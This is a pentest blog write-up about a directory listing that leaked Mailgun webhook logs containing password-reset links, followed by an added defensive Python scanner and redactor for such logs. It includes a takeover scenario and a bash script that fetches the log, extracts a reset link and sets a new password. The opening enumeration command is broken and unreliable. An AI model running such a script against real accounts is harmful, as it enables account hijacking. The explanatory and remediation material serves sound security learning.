Directory Listing to Account Takeover

Directory listing is one of the most common misconfigurations and can be exploited trivially. The impact, however, depends on how sensitive the files inside the directory are.

Recently, during one of my pentests, I came across an interesting open directory which I was able to leverage. While enumerating subdomains, I discovered one that was the staging server and was reachable over the internet.

[nishaanthguna:~/essentials]$ curl --silent\?q\ | sed 's/<\/\?[^>]\+>//g' | grep -i | tail -n +9 | cut -d ">" -f2 | cut -d "<" -f1

On running a port scan, I found that port 8080 was open and served a directory listing. There wasn’t anything sensitive until I found this.


From Mailgun’s API documentation, it looks like the administrator can track bounces, clicks, spam complaints, whether the mail was delivered and whether the user unsubscribed, along with the URLs that were clicked. So, what is the problem here?

Not only did the logs leak personal and developer e-mail addresses, they also contained the password reset links. Something like this,


An attack scenario would be something similar to,

  1. An attacker uses the e-mail address obtained from the logs and resets the password using ‘Forgot Password’ functionality.
  2. The victim clicks on the link sent to their e-mail address.
  3. The attacker gets hold of the password reset token because of the directory listing and resets the password.

I wrote a quick script to curl the mailgun-webhook.log file, search for reset links and automatically reset the password.


# The log URL was elided on the page; <LOG_URL> is a placeholder.
curl "<LOG_URL>/mailgun-webhook.log" | tee direct.txt
if grep -iq "reset" direct.txt; then
  echo "[+] Found a Password Reset link"
  # Pull the first reset URL out of the log line: the 6th comma-separated field, up to the escaped quote
  link=$(grep -i reset direct.txt | cut -d "," -f6 | cut -d "\\" -f1 | head -n 1)
  curl "$link" -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)' \
    --data 'password=testpassword%21%21&confirmation=testpassword%21%21' --compressed
  echo "[+] Password changed to testpassword!!"
else
  echo "[-] Reset link not found"
fi

It is always recommended to disable directory listing and never to store sensitive information such as credentials, password reset links or API keys in cleartext.
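The practical half of that advice is making sure single-use links never reach the log in the first place, and checking whether an existing log already contains them. The following is an added example, not code from the original post: it scans a Mailgun-style webhook log (a constructed JSON-lines sample, not the author's real log) for URLs that carry reset tokens, and produces a redacted copy in which token query values, token-like path segments and recipient addresses are masked. The field names and the reset-link shape are assumptions, since the post does not show the raw log line.

```python
import json
import re
from typing import Optional
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed sample log: one Mailgun-style webhook event per line. The field
# names only loosely follow Mailgun's click/delivery events and the reset-link
# format is an assumption; none of this is taken from the post.
SAMPLE_LOG = "\n".join([
    json.dumps({"event": "delivered", "recipient": "alice@example.com",
                "timestamp": 1500000000}),
    json.dumps({"event": "clicked", "recipient": "dev@example.com",
                "url": "https://app.example.com/reset?token=9f3c2a7b1e0d4c5a9f3c2a7b1e0d4c5a&uid=42"}),
    json.dumps({"event": "clicked", "recipient": "bob@example.com",
                "url": "https://app.example.com/reset-password/4b6e1d2c9a8f7e6d5c4b3a2918f7e6d5c4b3a291"}),
    json.dumps({"event": "clicked", "recipient": "carol@example.com",
                "url": "https://app.example.com/docs/getting-started"}),
])

REDACTED = "REDACTED"
# Query parameters whose values are typically single-use secrets.
SECRET_PARAMS = {"token", "reset_token", "code", "key", "signature"}
# Path keywords that mark a credential-bearing link.
RESET_PATH_RE = re.compile(r"(reset|password|verify|confirm)", re.IGNORECASE)
# Opaque path segments: 20+ chars of hex/base64url, i.e. a token carried in the path.
OPAQUE_SEGMENT_RE = re.compile(r"^[A-Za-z0-9_\-]{20,}$")
EMAIL_RE = re.compile(r"^([^@]+)@(.+)$")


def classify_link(url: str) -> Optional[str]:
    """Return why a URL counts as a leaked credential, or None if it looks benign."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if any(k.lower() in SECRET_PARAMS and v and v != REDACTED for k, v in params):
        return "secret query parameter"
    if RESET_PATH_RE.search(parts.path) and any(
            OPAQUE_SEGMENT_RE.match(seg) for seg in parts.path.split("/")):
        return "token embedded in path"
    return None


def redact_url(url: str) -> str:
    """Replace token-like query values and path segments with a fixed marker."""
    parts = urlsplit(url)
    query = [(k, REDACTED if k.lower() in SECRET_PARAMS else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    path = "/".join(REDACTED if OPAQUE_SEGMENT_RE.match(seg) else seg
                    for seg in parts.path.split("/"))
    return urlunsplit((parts.scheme, parts.netloc, path, urlencode(query), parts.fragment))


def mask_email(addr: str) -> str:
    """Keep the first character and the domain so records stay correlatable."""
    m = EMAIL_RE.match(addr)
    if not m:
        return addr
    local, domain = m.groups()
    return f"{local[0]}***@{domain}"


def scan_log(text: str) -> list:
    """Report (line number, field, reason) for every credential-bearing URL in the log."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        event = json.loads(line)
        for field, value in event.items():
            if isinstance(value, str) and value.startswith(("http://", "https://")):
                reason = classify_link(value)
                if reason:
                    findings.append((lineno, field, reason))
    return findings


def redact_event(event: dict) -> dict:
    """Return a copy of one event that is safe to write to a log file."""
    clean = {}
    for field, value in event.items():
        if isinstance(value, str) and value.startswith(("http://", "https://")):
            clean[field] = redact_url(value)
        elif isinstance(value, str) and "@" in value:
            clean[field] = mask_email(value)
        else:
            clean[field] = value
    return clean


def redact_log(text: str) -> str:
    """Redact every event in a JSON-lines log; the result passes scan_log() clean."""
    return "\n".join(json.dumps(redact_event(json.loads(line)))
                     for line in text.splitlines() if line.strip())


if __name__ == "__main__":
    for lineno, field, reason in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {field}: {reason}")
    print(redact_log(SAMPLE_LOG))
```

Run the scan over any webhook log you already keep to find out whether a leak like the one above has happened, and call `redact_event` in the webhook handler before the event is written anywhere. The token heuristics are deliberately broad (any long opaque path segment under a reset-like path, any of the listed query names); tune `SECRET_PARAMS` to the parameter names your own application actually uses.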

Update - Some people are confusing this vulnerability with the recent Reddit e-mail vulnerability which was used to steal Bitcoin Cash. The two vulnerabilities are completely unrelated, except that accounts were compromised in a similar fashion.
